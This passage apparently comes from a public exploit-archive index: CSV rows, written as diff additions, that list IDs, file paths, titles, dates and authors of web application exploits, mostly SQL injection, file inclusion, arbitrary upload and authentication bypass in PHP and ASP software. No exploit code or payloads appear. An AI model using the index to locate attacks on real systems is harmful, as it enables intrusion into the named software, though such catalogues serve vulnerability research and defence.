+12661,exploits/php/webapps/12661.txt,"DBCart - 'article.php' SQL Injection",2010-05-19,v3n0m,webapps,php, +12664,exploits/asp/webapps/12664.txt,"Renista CMS - SQL Injection",2010-05-20,"Amir Afghanian",webapps,asp, +12665,exploits/php/webapps/12665.pl,"IMEDIA - 'index.php' SQL Injection",2010-05-20,kannibal615,webapps,php, +12666,exploits/php/webapps/12666.txt,"DB[CMS] - 'article.php' SQL Injection",2010-05-20,blackraptor,webapps,php, +12667,exploits/php/webapps/12667.py,"Entry Level Content Management System (EL CMS) - SQL Injection",2010-05-20,vir0e5,webapps,php, +12671,exploits/php/webapps/12671.txt,"Powder Blue Design - SQL Injection",2010-05-20,cyberlog,webapps,php, +12672,exploits/asp/webapps/12672.txt,"Spaw Editor 1.0/2.0 - Arbitrary File Upload",2010-05-20,Ma3sTr0-Dz,webapps,asp, +12674,exploits/php/webapps/12674.txt,"webYourPhotos 6.05 - 'index.php' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",webapps,php, +14341,exploits/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,webapps,php, +12676,exploits/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",webapps,php, +28046,exploits/php/webapps/28046.txt,"dotWidget for articles 2.0 - '/admin/editconfig.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,webapps,php, +28047,exploits/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusions",2006-06-17,"M.Hasran Addahroni",webapps,php, +28048,exploits/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,webapps,php, +28128,exploits/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,webapps,php,80 +12679,exploits/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated Traversal File Retrieval",2010-05-21,"Richard Brain",webapps,windows, +12680,exploits/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",webapps,windows, +12684,exploits/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,webapps,php, +12686,exploits/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,webapps,php, +12688,exploits/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",webapps,php, +12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple, +12690,exploits/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,webapps,php, +12691,exploits/php/webapps/12691.txt,"Online Job Board - Authentication Bypass",2010-05-21,cr4wl3r,webapps,php, +14322,exploits/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",webapps,php, +12692,exploits/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,webapps,php, +12693,exploits/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,webapps,asp, +12694,exploits/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote s",2010-05-22,cyberlog,webapps,php, +12695,exploits/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,webapps,php, +12696,exploits/php/webapps/12696.txt,"E-Commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",webapps,php, +12697,exploits/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload",2010-05-22,eidelweiss,webapps,php, +12699,exploits/php/webapps/12699.txt,"eWebEditor 1.x - 'WYSIWYG' Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,webapps,php, +12700,exploits/asp/webapps/12700.txt,"DotNetNuke - Arbitrary File Upload",2010-05-22,"Ra3cH & Ma3sTr0-Dz",webapps,asp, +12701,exploits/asp/webapps/12701.txt,"Rave Creations/UHM - 'artists.asp' SQL Injection",2010-05-22,Ra3cH,webapps,asp, +12702,exploits/php/webapps/12702.php,"ECShop - 'search.php' SQL Injection",2010-05-22,Jannock,webapps,php, +12703,exploits/php/webapps/12703.txt,"Recipes Website 1.0 - SQL Injection",2010-05-22,Mr.ThieF,webapps,php, +12706,exploits/php/webapps/12706.txt,"MMA Creative Design - SQL Injection",2010-05-23,XroGuE,webapps,php, +12707,exploits/php/webapps/12707.txt,"runt-communications Design - SQL Injection",2010-05-23,XroGuE,webapps,php, +12709,exploits/php/webapps/12709.txt,"webperformance eCommerce - SQL Injection",2010-05-23,cyberlog,webapps,php, +12711,exploits/php/webapps/12711.txt,"BBMedia Design's - SQL Injection",2010-05-23,XroGuE,webapps,php, +12712,exploits/php/webapps/12712.txt,"goffgrafix Design's - SQL Injection",2010-05-23,XroGuE,webapps,php, +12713,exploits/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,webapps,php, +12714,exploits/php/webapps/12714.txt,"infoware - SQL Injection",2010-05-24,cyberlog,webapps,php, +12715,exploits/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,webapps,multiple, +12716,exploits/php/webapps/12716.txt,"runt-communications Design - 'property_more.php' SQL Injection",2010-05-24,CoBRa_21,webapps,php, +12717,exploits/php/webapps/12717.txt,"Telia Web Design - 'index.php' SQL Injection",2010-05-24,CoBRa_21,webapps,php, +12718,exploits/php/webapps/12718.txt,"BBMedia Design's - 'news_more.php' SQL Injection",2010-05-24,gendenk,webapps,php, +12719,exploits/php/webapps/12719.txt,"PHP Graphy 0.9.7 - 'index.php' Remote Command Execution",2010-05-24,"Sn!pEr.S!Te Hacker",webapps,php, +12720,exploits/php/webapps/12720.txt,"Schaf-CMS 1.0 - SQL Injection",2010-05-24,Manas58,webapps,php, +12721,exploits/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,webapps,php, +12722,exploits/php/webapps/12722.txt,"interuse Website Builder & design - 'index2.php' SQL Injection",2010-05-24,CoBRa_21,webapps,php, +12723,exploits/php/webapps/12723.py,"Joomla! Component Q-Personel 1.0 - SQL Injection",2010-05-24,"Valentin Hoebel",webapps,php, +12724,exploits/php/webapps/12724.php,"WebAsys - Blind SQL Injection",2010-05-24,zsh.shell,webapps,php, +12725,exploits/php/webapps/12725.txt,"ALSCO CMS - SQL Injection",2010-05-24,PrinceofHacking,webapps,php, +12726,exploits/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",webapps,php, +12727,exploits/php/webapps/12727.txt,"LiSK CMS 4.4 - SQL Injection",2010-05-24,"High-Tech Bridge SA",webapps,php, +12728,exploits/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure",2010-05-24,"Praveen Darshanam",webapps,windows, +12729,exploits/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,webapps,php, +12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,webapps,multiple, +12731,exploits/php/webapps/12731.txt,"Webloader 8 - SQL Injection",2010-05-24,ByEge,webapps,php, +12732,exploits/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities",2010-05-24,eidelweiss,webapps,php, +12734,exploits/asp/webapps/12734.txt,"Blaze Apps - Multiple Vulnerabilities",2010-05-24,AmnPardaz,webapps,asp, +12735,exploits/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,webapps,php, +12736,exploits/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",webapps,php, +12737,exploits/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,webapps,php, +12743,exploits/php/webapps/12743.txt,"web5000 - 'page_show' SQL Injection",2010-05-25,"BLack Revenge",webapps,php, +12744,exploits/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,webapps,php, +12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php, +12748,exploits/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,webapps,php, +12749,exploits/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,webapps,php, +12750,exploits/windows/webapps/12750.txt,"RapidWareX 2.0.1 - 'WebUI' Cross-Site Request Forgery",2010-05-26,l3D,webapps,windows, +12754,exploits/php/webapps/12754.html,"Easy Address book WebServer 1.2 - Cross-Site Request Forgery",2010-05-26,Markot,webapps,php, +12755,exploits/php/webapps/12755.txt,"Multi Vendor Mall - 'itemdetail.php?& shop.php' SQL Injection",2010-05-26,CoBRa_21,webapps,php, +12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php, +12761,exploits/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,webapps,php, +12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php, +12766,exploits/php/webapps/12766.txt,"PPhlogger 2.2.5 - 'trace.php' Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",webapps,php, +12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,webapps,php, +12768,exploits/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,webapps,php, +12769,exploits/php/webapps/12769.txt,"Joomla! Component com_mediqna 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,webapps,php, +12770,exploits/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,webapps,php, +12771,exploits/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,webapps,php, +12772,exploits/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,webapps,php, +12773,exploits/php/webapps/12773.txt,"Realtor Real Estate Agent - 'idproperty' SQL Injection",2010-05-28,v3n0m,webapps,php, +12776,exploits/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,webapps,php, +12777,exploits/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,webapps,php, +12779,exploits/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,webapps,php, +12780,exploits/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,webapps,php, +12781,exploits/php/webapps/12781.txt,"Joomla! Component JE Poll - 'pollid' SQL Injection",2010-05-28,v3n0m,webapps,php, +12782,exploits/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,webapps,php, +12785,exploits/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,webapps,php, +12786,exploits/windows/webapps/12786.txt,"fusebox - 'ProductList.cfm?CatDisplay' SQL Injection",2010-05-29,Shamus,webapps,windows, +12787,exploits/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,webapps,php, +12788,exploits/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,webapps,php, +12790,exploits/php/webapps/12790.txt,"Nucleus Plugin Twitter - Remote File Inclusion",2010-05-29,AntiSecurity,webapps,php, +12791,exploits/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,webapps,php, +12792,exploits/php/webapps/12792.txt,"MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-29,XroGuE,webapps,php, +12793,exploits/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,webapps,php, +12794,exploits/php/webapps/12794.txt,"Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection",2010-05-29,gendenk,webapps,php, +12796,exploits/php/webapps/12796.txt,"Joomla! Component BF Quiz 1.0 - SQL Injection (2)",2010-05-29,"Valentin Hoebel",webapps,php, +12797,exploits/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,webapps,php, +12798,exploits/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,webapps,php, +12801,exploits/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,webapps,php, +12805,exploits/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,webapps,php, +12806,exploits/php/webapps/12806.txt,"CMScout - Cross-Site Scripting / HTML Injection",2010-05-30,XroGuE,webapps,php, +12807,exploits/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,webapps,php, +12808,exploits/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,webapps,php, +12809,exploits/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,webapps,php, +12811,exploits/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Arbitrary File Upload",2010-05-30,MasterGipy,webapps,php, +12812,exploits/php/webapps/12812.txt,"Joomla! Component com_quran - SQL Injection",2010-05-30,r3m1ck,webapps,php, +12813,exploits/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,webapps,php, +12814,exploits/php/webapps/12814.txt,"Joomla! Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,webapps,php, +12817,exploits/php/webapps/12817.txt,"QuickTalk 1.2 - Source Code Disclosure",2010-05-31,indoushka,webapps,php, +12818,exploits/php/webapps/12818.txt,"e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting",2010-05-31,indoushka,webapps,php, +12819,exploits/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,webapps,php, +12820,exploits/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,webapps,php, +12822,exploits/php/webapps/12822.txt,"Joomla! Component JS Jobs 1.0.5.8 - SQL Injection",2010-05-31,d0lc3,webapps,php, +12823,exploits/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,webapps,php, +12833,exploits/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",webapps,asp, +12839,exploits/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,webapps,php, +12840,exploits/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX & Cr3W-DZ",webapps,php, +12841,exploits/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,webapps,asp, +12842,exploits/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity - Blind SQL Injection",2010-06-02,_mlk_,webapps,php, +12843,exploits/php/webapps/12843.txt,"Joomla! Component ChronoForms - Blind SQL Injection",2010-06-02,_mlk_,webapps,php, +12845,exploits/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,webapps,php, +12848,exploits/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,webapps,php, +12849,exploits/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,webapps,php, +12850,exploits/php/webapps/12850.txt,"Member ID The Fish Index PHP - SQL Injection",2010-06-03,v4lc0m87,webapps,php, +12855,exploits/php/webapps/12855.txt,"phpBazar 2.1.1 stable - Remote File Inclusion",2010-06-03,Sid3^effects,webapps,php, +12856,exploits/php/webapps/12856.txt,"osCSS 1.2.1 - Arbitrary File Upload",2010-06-03,indoushka,webapps,php, +12857,exploits/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities",2010-06-03,indoushka,webapps,php, +12858,exploits/php/webapps/12858.txt,"Article Management System 2.1.2 - Reinstall",2010-06-03,indoushka,webapps,php, +12859,exploits/php/webapps/12859.txt,"Advneced Management For Services Sites - File Disclosure",2010-06-03,indoushka,webapps,php, +12861,exploits/php/webapps/12861.txt,"PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion",2010-06-03,eidelweiss,webapps,php, +12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php, +12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php, +12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php, +30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",webapps,php, +18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php, +18594,exploits/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php, +14247,exploits/php/webapps/14247.txt,"Auction_Software Script - Admin Authentication Bypass",2010-07-06,ALTBTA,webapps,php, +13736,exploits/php/webapps/13736.txt,"DDLCMS 2.1 - 'skin' Remote File Inclusion",2010-06-06,eidelweiss,webapps,php, +13737,exploits/php/webapps/13737.txt,"Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities",2010-06-06,d0lc3,webapps,php, +13738,exploits/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,webapps,php, +13739,exploits/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,webapps,php, +13740,exploits/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,webapps,php, +13741,exploits/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection",2010-06-06,Sid3^effects,webapps,php, +13744,exploits/php/webapps/13744.txt,"RTRandomImage - Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",webapps,php, +13745,exploits/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,webapps,php, +13746,exploits/php/webapps/13746.txt,"Joomla! Component Search Log 3.1.0 - SQL Injection",2010-06-06,d0lc3,webapps,php, +13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,webapps,php, +13748,exploits/php/webapps/13748.txt,"Joomla! Component com_annonces - Arbitrary File Upload",2010-06-06,Sid3^effects,webapps,php, +13749,exploits/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,webapps,php, +13750,exploits/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,webapps,php, +13751,exploits/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,webapps,php, +13752,exploits/php/webapps/13752.txt,"ReVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,webapps,php, +13754,exploits/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",webapps,multiple, +13762,exploits/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,webapps,php, +13766,exploits/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",webapps,php, +13769,exploits/php/webapps/13769.txt,"CafeEngine 2.3 - SQL Injection",2010-06-08,Sid3^effects,webapps,php, +13770,exploits/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",webapps,php, +13771,exploits/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",webapps,php, +13772,exploits/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,webapps,php, +13773,exploits/php/webapps/13773.txt,"Holiday Travel Portal - Arbitrary File Upload",2010-06-08,Sid3^effects,webapps,php, +13776,exploits/php/webapps/13776.txt,"Phreebooks 2.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-06-08,"Gustavo Sorondo",webapps,php, +13777,exploits/php/webapps/13777.txt,"Phreebooks 2.0 - Local File Inclusion",2010-06-08,"Gustavo Sorondo",webapps,php, +13778,exploits/php/webapps/13778.txt,"Phreebooks 2.0 - Directory Traversal",2010-06-08,"Gustavo Sorondo",webapps,php, +13779,exploits/php/webapps/13779.txt,"Pre Web Host - SQL Injection",2010-06-08,Mr.Benladen,webapps,php, +13781,exploits/php/webapps/13781.txt,"phpList 2.8.11 - SQL Injection",2010-06-08,d3v1l,webapps,php, +13782,exploits/php/webapps/13782.txt,"Image Store - Arbitrary File Upload",2010-06-08,Mr.FireStormm,webapps,php, +13783,exploits/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",webapps,php, +13784,exploits/php/webapps/13784.txt,"HauntmAx CMS Haunted House - Directory Listing / SQL Injection",2010-06-09,Sid3^effects,webapps,php, +13785,exploits/php/webapps/13785.txt,"eLms Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,webapps,php, +13786,exploits/php/webapps/13786.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (1)",2010-06-09,Sid3^effects,webapps,php, +13788,exploits/asp/webapps/13788.txt,"Web Wiz Forums 9.68 - SQL Injection",2010-06-09,Sid3^effects,webapps,asp, +13789,exploits/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQL Injection",2010-06-09,Sid3^effects,webapps,asp, +14294,exploits/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,webapps,php, +13790,exploits/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,webapps,asp, +14333,exploits/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,webapps,php, +13792,exploits/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,webapps,php, +13793,exploits/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",webapps,asp, +13794,exploits/multiple/webapps/13794.txt,"Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,webapps,multiple, +27972,exploits/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,webapps,php, +27973,exploits/php/webapps/27973.txt,"Bookmark4U 2.0 - '/inc/dbase.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,webapps,php, +27974,exploits/php/webapps/27974.txt,"Bookmark4U 2.0 - '/inc/config.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,webapps,php, +13796,exploits/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,webapps,php, +13797,exploits/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,webapps,php, +13798,exploits/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,webapps,php, +13799,exploits/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,webapps,php, +13800,exploits/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,webapps,php, +13801,exploits/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",webapps,php, +13802,exploits/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",webapps,php, +13803,exploits/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",webapps,php, +13804,exploits/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,webapps,php, +13805,exploits/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",webapps,php, +13807,exploits/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - SQL Injection",2010-06-09,TinKode,webapps,php, +13810,exploits/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,webapps,php, +13812,exploits/php/webapps/13812.txt,"SchoolMation 2.3 - SQL Injection / Cross-Site Scripting",2010-06-10,Sid3^effects,webapps,php, +13813,exploits/php/webapps/13813.html,"Store Locator - Cross-Site Request Forgery (Add Admin)",2010-06-10,JaMbA,webapps,php, +13814,exploits/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,webapps,asp, +13815,exploits/asp/webapps/13815.pl,"Netvolution CMS 2.x - SQL Injection Script",2010-06-10,"amquen & krumel",webapps,asp, +13816,exploits/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",webapps,php, +13819,exploits/php/webapps/13819.txt,"E-PHP B2B Marketplace - Multiple Vulnerabilities",2010-06-11,MizoZ,webapps,php, +13826,exploits/php/webapps/13826.txt,"Site for Real Estate - Brokers SQL Injection",2010-06-11,"L0rd CrusAd3r",webapps,php, +13827,exploits/php/webapps/13827.txt,"Development Site Professional Liberal - Company Institutional SQL Injection",2010-06-11,"L0rd CrusAd3r",webapps,php, +13829,exploits/php/webapps/13829.txt,"Site to Store Automobile - Motorcycle Boat SQL Injection",2010-06-11,"L0rd CrusAd3r",webapps,php, +13830,exploits/php/webapps/13830.txt,"DaLogin - Multiple Vulnerabilities",2010-06-11,hc0,webapps,php, +13831,exploits/php/webapps/13831.txt,"Full Site for Restaurant - SQL Injection",2010-06-11,"L0rd CrusAd3r",webapps,php, +13832,exploits/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion",2010-06-11,cr4wl3r,webapps,php, +13833,exploits/php/webapps/13833.txt,"Parallels System Automation (PSA) - Local File Inclusion",2010-06-11,"Pouya Daneshmand",webapps,php, +13835,exploits/php/webapps/13835.txt,"DaLogin 2.2 - 'FCKeditor' Arbitrary File Upload",2010-06-11,eidelweiss,webapps,php, +13840,exploits/asp/webapps/13840.txt,"VU Case Manager - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",webapps,asp, +13841,exploits/asp/webapps/13841.txt,"VU Mass Mailer - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",webapps,asp, +13842,exploits/asp/webapps/13842.txt,"VU Web Visitor Analyst - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",webapps,asp, +13843,exploits/asp/webapps/13843.txt,"BrightSuite Groupware - SQL Injection",2010-06-12,"L0rd CrusAd3r",webapps,asp, +13844,exploits/php/webapps/13844.pl,"Collabtive 0.6.3 - Multiple Vulnerabilities",2010-06-12,DNX,webapps,php, +13845,exploits/php/webapps/13845.txt,"Yamamah - 'news' SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,webapps,php, +13846,exploits/asp/webapps/13846.txt,"BDSMIS TraX with Payroll - SQL Injection",2010-06-12,"L0rd CrusAd3r",webapps,asp, +13847,exploits/php/webapps/13847.txt,"phpplanner - Cross-Site Scripting / SQL Injection",2010-06-12,anT!-Tr0J4n,webapps,php, +13848,exploits/php/webapps/13848.txt,"Infront - SQL Injection",2010-06-12,TheMaStEr,webapps,php, +13849,exploits/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,webapps,php, +13852,exploits/php/webapps/13852.txt,"PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,cp77fk4r,webapps,php, +13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php, +13855,exploits/php/webapps/13855.txt,"Eyeland Studio Inc. - SQL Injection",2010-06-13,Mr.P3rfekT,webapps,php, +13856,exploits/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure",2010-06-13,mat,webapps,php, +13857,exploits/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 - 'calbums' SQL Injection",2010-06-13,CoBRa_21,webapps,php, +13858,exploits/php/webapps/13858.txt,"Eyeland Studio Inc. - 'game.php' SQL Injection",2010-06-13,CoBRa_21,webapps,php, +13859,exploits/asp/webapps/13859.txt,"Digital Interchange Document Library - 